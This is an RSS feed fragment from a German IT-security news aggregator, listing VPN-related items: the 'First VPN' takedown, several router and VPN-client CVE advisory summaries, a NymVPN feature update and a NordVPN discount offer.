<title><![CDATA[Behörden schalten kriminell genutzten VPN-Dienst ab]]></title> 
<description><![CDATA[Ermittler haben zum Schlag gegen die Internetkriminalit&auml;t ausgeholt und den Dienst First VPN vom Netz genommen. In einer konzertierten Aktion des niederl&auml;ndischen Team High Tech Crime und franz&ouml;sischer Beh&ouml;rden wurde die Infrastruktur bereits am 19. und 20. Mai zerschlagen. Der...Zum Beitrag: Beh&ouml;rden schalten kriminell genutzten VPN-Dienst ab

Wo du uns folgen kannst:
Facebook, Reddit, Google News, X, Threads


    Auf dem Laufenden bleiben?
    
    F&uuml;gt uns doch bei Google als bevorzugte Quelle hinzu!
 ]]></description>
<link>https://tsecurity.de/de/3547399/IT+Nachrichten/Beh%C3%B6rden+schalten+kriminell+genutzten+VPN-Dienst+ab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547399/IT+Nachrichten/Beh%C3%B6rden+schalten+kriminell+genutzten+VPN-Dienst+ab/</guid>
<pubDate>Tue, 26 May 2026 09:45:58 +0200</pubDate>
</item>
<item> 
<title><![CDATA[ChromaDB-Fehlkonfiguration, GitHub-Extension-Angriff und VPN-Zerschlagung: Security-Update]]></title> 
<description><![CDATA[LONDON (IT BOLTWISE) &ndash; Mehrere Ereignisse aus der Cybersicherheit h&auml;ufen sich: Eine macOS-Infostealer-Kampagne umgeht Sicherheitswarnungen, Tausende GitHub-Repositories geraten &uuml;ber eine kompromittierte VS-Code-Erweiterung unter Risiko, und Ermittler haben im Rahmen einer internationalen Aktion eine weit verbreitete VPN-Infrastruktur abgeschaltet. Zus&auml;tzlich wurde in ChromaDB, einer zentralen Datenbank f&uuml;r KI-Anwendungen, eine kritisch bewertete Schwachstelle bekannt, die Code-Ausf&uuml;hrung vor der [&hellip;]
... den vollst&auml;ndigen Artikel &raquo;ChromaDB-Fehlkonfiguration, GitHub-Extension-Angriff und VPN-Zerschlagung: Security-Update&laquo; lesen
Dieser Beitrag ChromaDB-Fehlkonfiguration, GitHub-Extension-Angriff und VPN-Zerschlagung: Security-Update erschien als erstes auf IT BOLTWISE x Artificial Intelligence. ]]></description>
<link>https://tsecurity.de/de/3546758/IT+Sicherheit/Cybersecurity+Nachrichten/ChromaDB-Fehlkonfiguration%2C+GitHub-Extension-Angriff+und+VPN-Zerschlagung%3A+Security-Update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546758/IT+Sicherheit/Cybersecurity+Nachrichten/ChromaDB-Fehlkonfiguration%2C+GitHub-Extension-Angriff+und+VPN-Zerschlagung%3A+Security-Update/</guid>
<pubDate>Tue, 26 May 2026 05:28:59 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Operation Saffron zerschlägt First VPN: Anonymisierungsnetz für Ransomware offline]]></title> 
<description><![CDATA[LONDON (IT BOLTWISE) &ndash; In der Nacht auf den 20. Mai 2026 hat die internationale Polizei- und Justizkooperation &bdquo;Operation Saffron&ldquo; das kriminell betriebene VPN &bdquo;First VPN&ldquo; zerschlagen. Laut Berichten wurden 33 Server beschlagnahmt, Domains sowie Tor-Onion-Domains abgeschaltet und der Administrator festgenommen. Besonders kritisch: Ermittler konnten Nutzerdaten und Verkehrslogs erlangen, wodurch eine zentrale Anonymisierungsschicht f&uuml;r mindestens [&hellip;]
... den vollst&auml;ndigen Artikel &raquo;Operation Saffron zerschl&auml;gt First VPN: Anonymisierungsnetz f&uuml;r Ransomware offline&laquo; lesen
Dieser Beitrag Operation Saffron zerschl&auml;gt First VPN: Anonymisierungsnetz f&uuml;r Ransomware offline erschien als erstes auf IT BOLTWISE x Artificial Intelligence. ]]></description>
<link>https://tsecurity.de/de/3546614/IT+Sicherheit/Cybersecurity+Nachrichten/Operation+Saffron+zerschl%C3%A4gt+First+VPN%3A+Anonymisierungsnetz+f%C3%BCr+Ransomware+offline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546614/IT+Sicherheit/Cybersecurity+Nachrichten/Operation+Saffron+zerschl%C3%A4gt+First+VPN%3A+Anonymisierungsnetz+f%C3%BCr+Ransomware+offline/</guid>
<pubDate>Tue, 26 May 2026 02:46:36 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2018-25368 | NordVPN up to 6.14.31 Password memory allocation (Exploit 45304 / EUVD-2018-21891)]]></title> 
<description><![CDATA[A vulnerability has been found in NordVPN up to 6.14.31 and classified as problematic. This issue affects some unknown processing. The manipulation of the argument Password leads to uncontrolled memory allocation.

This vulnerability is documented as CVE-2018-25368. The attack can be initiated remotely. Additionally, an exploit exists. ]]></description>
<link>https://tsecurity.de/de/3546166/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2018-25368+%7C+NordVPN+up+to+6.14.31+Password+memory+allocation+%28Exploit+45304+%2F+EUVD-2018-21891%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546166/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2018-25368+%7C+NordVPN+up+to+6.14.31+Password+memory+allocation+%28Exploit+45304+%2F+EUVD-2018-21891%29/</guid>
<pubDate>Mon, 25 May 2026 19:51:16 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-9456 | Totolink A8000RU 7.1cu.643_b20200521 Web Management Interface /cgi-bin/cstecgi.cgi setOpenVpnCfg enabled os command injection (EUVD-2026-31674)]]></title> 
<description><![CDATA[A vulnerability categorized as critical has been discovered in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setOpenVpnCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument enabled results in os command injection.

This vulnerability is identified as CVE-2026-9456. The attack can be executed remotely. Additionally, an exploit exists. ]]></description>
<link>https://tsecurity.de/de/3545800/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9456+%7C+Totolink+A8000RU+7.1cu.643_b20200521+Web+Management+Interface+%2Fcgi-bin%2Fcstecgi.cgi+setOpenVpnCfg+enabled+os+command+injection+%28EUVD-2026-31674%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545800/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9456+%7C+Totolink+A8000RU+7.1cu.643_b20200521+Web+Management+Interface+%2Fcgi-bin%2Fcstecgi.cgi+setOpenVpnCfg+enabled+os+command+injection+%28EUVD-2026-31674%29/</guid>
<pubDate>Mon, 25 May 2026 16:19:04 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-9455 | Totolink A8000RU 7.1cu.643_b20200521 Web Management Interface /cgi-bin/cstecgi.cgi UploadOpenVpnCert FileName os command injection (EUVD-2026-31673)]]></title> 
<description><![CDATA[A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. It has been rated as critical. This issue affects the function UploadOpenVpnCert of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument FileName leads to os command injection.

This vulnerability is referenced as CVE-2026-9455. Remote exploitation of the attack is possible. Furthermore, an exploit is available. ]]></description>
<link>https://tsecurity.de/de/3545799/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9455+%7C+Totolink+A8000RU+7.1cu.643_b20200521+Web+Management+Interface+%2Fcgi-bin%2Fcstecgi.cgi+UploadOpenVpnCert+FileName+os+command+injection+%28EUVD-2026-31673%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545799/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9455+%7C+Totolink+A8000RU+7.1cu.643_b20200521+Web+Management+Interface+%2Fcgi-bin%2Fcstecgi.cgi+UploadOpenVpnCert+FileName+os+command+injection+%28EUVD-2026-31673%29/</guid>
<pubDate>Mon, 25 May 2026 16:19:05 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-9454 | Totolink A8000RU 7.1cu.643_b20200521 Web Management Interface /cgi-bin/cstecgi.cgi setOpenVpnCertGenerationCfg servername os command injection (EUVD-2026-31670)]]></title> 
<description><![CDATA[A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. It has been declared as critical. This vulnerability affects the function setOpenVpnCertGenerationCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument servername can lead to os command injection.

The identification of this vulnerability is CVE-2026-9454. The attack may be launched remotely. Furthermore, there is an exploit available. ]]></description>
<link>https://tsecurity.de/de/3545797/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9454+%7C+Totolink+A8000RU+7.1cu.643_b20200521+Web+Management+Interface+%2Fcgi-bin%2Fcstecgi.cgi+setOpenVpnCertGenerationCfg+servername+os+command+injection+%28EUVD-2026-31670%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545797/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9454+%7C+Totolink+A8000RU+7.1cu.643_b20200521+Web+Management+Interface+%2Fcgi-bin%2Fcstecgi.cgi+setOpenVpnCertGenerationCfg+servername+os+command+injection+%28EUVD-2026-31670%29/</guid>
<pubDate>Mon, 25 May 2026 16:19:05 +0200</pubDate>
</item>
<item> 
<title><![CDATA[From split-tunneling to post-quantum crypto: NymVPN just had its biggest two-month update yet, and a fresh redesign is already on the way]]></title> 
<description><![CDATA[NymVPN rolled out split-tunneling, ad blocking, post-quantum encryption, and a Pay as You Go tier across March and April 2026. Here&#039;s the full recap and what&#039;s next. ]]></description>
<link>https://tsecurity.de/de/3544892/IT+Nachrichten/From+split-tunneling+to+post-quantum+crypto%3A+NymVPN+just+had+its+biggest+two-month+update+yet%2C+and+a+fresh+redesign+is+already+on+the+way/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544892/IT+Nachrichten/From+split-tunneling+to+post-quantum+crypto%3A+NymVPN+just+had+its+biggest+two-month+update+yet%2C+and+a+fresh+redesign+is+already+on+the+way/</guid>
<pubDate>Mon, 25 May 2026 08:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[3 Monate geschenkt: NordVPN kombiniert VPN und Antivirus jetzt mit bis zu 76 Prozent Rabatt]]></title> 
<description><![CDATA[VPNs k&ouml;nnen inzwischen deutlich mehr als nur den Streaming-Katalog erweitern. NordVPN startet jetzt seine Next-Gen-Antivirus-Kampagne mit bis zu 76 Prozent Rabatt und 3 Gratis-Monaten.
																					Dieser Artikel wurde einsortiert unter 
																	Schn&auml;ppchen,																	VPN-Dienste im Vergleich: Mit unserem Testsieger sicher und anonym durchs Internet,																	NordVPN. ]]></description>
<link>https://tsecurity.de/de/3544152/IT+Nachrichten/3+Monate+geschenkt%3A+NordVPN+kombiniert+VPN+und+Antivirus+jetzt+mit+bis+zu+76+Prozent+Rabatt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544152/IT+Nachrichten/3+Monate+geschenkt%3A+NordVPN+kombiniert+VPN+und+Antivirus+jetzt+mit+bis+zu+76+Prozent+Rabatt/</guid>
<pubDate>Sun, 24 May 2026 19:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[First VPN zerschlagen: Exit-Nodes für 25 Ransomware-Gruppen]]></title> 
<description><![CDATA[PARIS / LONDON (IT BOLTWISE) &ndash; Bei einer koordinierten internationalen Operation haben Beh&ouml;rden in Europa und Nordamerika das kriminelle VPN-Angebot &bdquo;First VPN&ldquo; zerschlagen. Die Infrastruktur soll von mindestens 25 Ransomware-Gruppen f&uuml;r Aufkl&auml;rung, Einbruch und Datenabfluss genutzt worden sein. Laut Europol und Eurojust waren an dem Betrieb mehrere L&auml;nder beteiligt, w&auml;hrend parallel Domains, Server und Kommunikationskan&auml;le [&hellip;]
... den vollst&auml;ndigen Artikel &raquo;First VPN zerschlagen: Exit-Nodes f&uuml;r 25 Ransomware-Gruppen&laquo; lesen
Dieser Beitrag First VPN zerschlagen: Exit-Nodes f&uuml;r 25 Ransomware-Gruppen erschien als erstes auf IT BOLTWISE x Artificial Intelligence. ]]></description>
<link>https://tsecurity.de/de/3542923/IT+Sicherheit/Cybersecurity+Nachrichten/First+VPN+zerschlagen%3A+Exit-Nodes+f%C3%BCr+25+Ransomware-Gruppen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3542923/IT+Sicherheit/Cybersecurity+Nachrichten/First+VPN+zerschlagen%3A+Exit-Nodes+f%C3%BCr+25+Ransomware-Gruppen/</guid>
<pubDate>Sun, 24 May 2026 05:35:10 +0200</pubDate>
</item>
</channel> 
</rss>
<!-- Generated in 0,23ms -->